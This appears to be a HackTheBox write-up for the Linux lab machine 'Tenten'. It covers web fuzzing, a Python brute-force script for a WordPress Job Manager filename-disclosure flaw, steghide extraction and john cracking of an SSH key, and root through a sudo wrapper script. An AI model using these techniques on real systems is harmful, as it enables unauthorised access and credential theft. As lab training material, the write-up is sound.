Tenten

#Linux #Web #IDOR

Tenten is an medium-rated Linux machine from HackTheBox created by ch4p. In the current post, my IP is 10.10.14.3, and the target’s IP is 10.10.10.10

This machine is quite interesting at the beginning, but as you progress, it has several sections that are counterintuitive. Firstly, you have to do reconnaissance to obtain the keywords and the WordPress plugins that the website has. With that information, you have to write a script to brute-force the website and obtain the key file, which of course is encrypted. Here, Steghide and John are used. Once achieved, you can access the machine; the privilege escalation is comical.

Recon

Local Terminal

> ping -c 1 10.10.10.10

PING 10.10.10.10 (10.10.10.10) 56(84) bytes of data.
64 bytes from 10.10.10.10: icmp_seq=1 ttl=63 time=158 ms

--- 10.10.10.10 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 157.963/157.963/157.963/0.000 ms

The machine is alive, and by the TTL (close but no more than 64), it is possible to think that the target is a Linux Machine.

Local Terminal

nmap -p- -sS --min-rate=5000 -Pn -n -oN AllPorts 10.10.10.10

Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-12 13:40 -03
Nmap scan report for 10.10.10.10
Host is up (0.15s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Local Terminal

nmap -sCV -p22,80 -oN Target 10.10.10.10 -oN Target

Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-12 13:41 -03
Nmap scan report for 10.10.10.10
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://tenten.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two open ports. First the port 22 with ssh, if you search about "OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 launchpad", we can see that the target is an "Ubuntu Xenial". And about the port 80, the web page, if you search "Apache httpd 2.4.18 launchpad", it confirms that is an Ubuntu Xenial.

Both are the same, so there is a significant reduced chance to find a Docker Container here.

The port 80 have a redirect, add the IP to the /etc/hosts and launch another nmap scan.

Local Terminal

nmap --script http-enum -p80 10.10.10.10

Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-12 13:41 -03
Nmap scan report for 10.10.10.10
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://tenten.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

Local Terminal

> whatweb http://10.10.10.10

http://10.10.10.10 [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.10], 
RedirectLocation[http://tenten.htb/], Title[301 Moved Permanently]

http://tenten.htb/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.10], JQuery[1.12.4], 
MetaGenerator[WordPress 4.7.3], PoweredBy[WordPress,WordPress,], 
Script[text/javascript], Title[Job Portal 
– Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3]

Wordpress 4.7.3, kept that in mind.

• http://tenten.htb/

Wappalizer: PHP, good to know.

http://tenten.htb/index.php/2017/04/12/hello-world/

From the post, we have one user [+] Takis, try if works at the default login page to validate.

http://tenten.htb/wp-login.php - Valid User

By following the page Job Listing > Pen Tester > Apply Now, it is possible to notice the URL is rather suspicious, including IDs. Let's fuzz it.

• http://tenten.htb/index.php/jobs/apply/8/

Local Terminal

wfuzz -c -t 20 --hh 57528 -z range,0-100 http://tenten.htb/index.php/jobs/apply/FUZZ/

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000003:   200        395 L    3982 W     57633 Ch    "2"
000000007:   200        395 L    3982 W     57644 Ch    "6"
000000014:   200        395 L    3979 W     57685 Ch    "13"
000000010:   200        395 L    3977 W     57589 Ch    "9"
000000011:   200        395 L    3979 W     57639 Ch    "10"
000000009:   200        395 L    3982 W     57634 Ch    "8"
000000013:   200        395 L    3979 W     57641 Ch    "12"
000000012:   200        395 L    3979 W     57623 Ch    "11"
000000006:   200        395 L    3982 W     57629 Ch    "5"
000000008:   200        395 L    3979 W     57626 Ch    "7"
000000002:   200        395 L    3982 W     57636 Ch    "1"
000000004:   200        395 L    3982 W     57618 Ch    "3"

Alternative by S4vitar

for i in $(seq 1 100); do echo "[+] Para el numero $i: $(curl -s -X GET "http://tenten.htb/index.php/jobs/apply/$i/" | html2text | grep "Job Application" | awk '{print $2}' FS=":" | sed 's/*^ *//')"; done

By exploring each available site, the number 13 is the correct one, with an extremely explicit title, HackerAccessGranted.

• http://tenten.htb/index.php/jobs/apply/13/

Now, we have the vulnerable site, but before trying anything, to save time, it's necessary to fuzz for plugins.

• http://tenten.htb/wp-content/plugins

  • Perfect, there is a response.

Local Terminal

wfuzz -c --hc=404 -w /opt/Seclists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt http://tenten.htb/FUZZ

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000468:   200        0 L      0 W        0 Ch        "wp-content/plugins/akismet/"
000004593:   500        0 L      0 W        0 Ch        "wp-content/plugins/hello.php/"
000004592:   500        0 L      0 W        0 Ch        "wp-content/plugins/hello.php"
000005242:   403        11 L     32 W       316 Ch      "wp-content/plugins/job-manager/"

[+] akismet, hello.php and job-manager.

Exploitation

Local Terminal

searchsploit job manager

-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Plunet BusinessManager 4.1 - 'pagesUTF8/auftrag_job.jsp?Pfad' Direct Request Information Disclosure                 | jsp/webapps/32710.txt
WordPress Plugin Job Manager 0.7.22 - Persistent Cross-Site Scripting                                               | php/webapps/37738.txt
WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting                                                           | php/webapps/45031.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

See the content of the "Cross-Site Scripting" exploit, it's the version 4.1.0, it should be that.

Local Terminal

searchsploit -x php/webapps/45031.txt

Ok, nothing to see here, it's weird. search for "Wordpress Plugin Job Manager exploit"

WordPress Plugin Job Manager Security Bypass (0.7.25) - Vulnerabilities - AcunetixAcunetix

"Allow attackers to perform otherwise restricted actions and subsequently enumerate and access the uploaded CV files by performing a bruteforce attack on the WordPress upload directory structure." So we can create an script to explore the upload folder by using the Wordpress structure.

exploit.py

import requests, signal, sys

print("""
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
""")

website = input('Enter a vulnerable website: ')
filename = input('Enter a file name: ')

filename2 = filename.replace(" ","-")


for year in range(2017,2023): # Year of the first post vs now
    for i in range(1,13): # Months
        for extension in {'doc', 'pdf', 'docx', 'jpg', 'png', 'gif'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print("[+] URL of CV found! " + URL)
                sys.exit(0)

This part of the machine is weird, the previously found name is the correct one, is a kind of non intuitive, but if you want to reflect this in a real life situation, you can use a wordlist or Cewl to get a wordlist from the most common words of the website, increasing the chances of finding something.

Local Terminal

python3 exploit.py
# Enter a vulnerable website: http://tenten.htb
# Enter a file name: HackerAccessGranted

[+] URL of CV found! http://tenten.htb/wp-content/uploads/2017/04/HackerAccessGranted.jpg

Now download the file.

Local Terminal

> wget http://tenten.htb/wp-content/uploads/2017/04/HackerAccessGranted.jpg

HackerAccessGranted.jpg... nothing.

Reverse Shell - Decrypting

This is another non-intuitive part, here we have to explore the file thought decryption methods.

Local Terminal

> exiftool HackerAccessGranted.jpg
    # Nothing
> strings exiftool HackerAccessGranted.jpg -n 10
    # Nothing
> steghide info HackerAccessGranted.jpg
"HackerAccessGranted.jpg":
  format: jpeg
  capacity: 15.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "id_rsa":
    size: 1.7 KB
    encrypted: rijndael-128, cbc
    compressed: yes

Perfect, for some reason the Id_rsa is inside...

Local Terminal

> steghide extract -sf HackerAccessGranted.jpg
> cat id_rsa

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

/HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
<...>

Aaaand it's encrypted... nice. Here you can use john or another tool.

Local Terminal

> /usr/share/john/ssh2john.py id_rsa > hash
> john -w:/opt/wordlist/rockyou.txt hash

[+] superpassword

Finally, we have the password, now try to login as takis

Local Terminal

> chmod 600 id_rsa
> ssh -i id_rsa takis@10.10.10.10
    # superpassword

Target Terminal [Takis]

> cat user.txt

Privileges Escalation

Target Terminal [Takis]

takis@tenten:~$ whoami
takis

takis@tenten:~$ id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)

Group lxd, this one has a lot of vulnerabilities.

Local Terminal

> searchsploit lxd
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Ubuntu 18.04 - 'lxd' Privilege Escalation                                                                           | linux/local/46978.sh
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
> searchsploit -x linux/local/46978.sh

Or you can continue your recon and find something really interesting.

Target Terminal [Takis]

takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
    
> cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4

Or you can change to root by using... that simple bash command.

Target Terminal [Takis]

takis@tenten:~$ sudo /bin/fuckin bash

Done

Target Terminal [root]

root@tenten:~$ cat /root/root.txt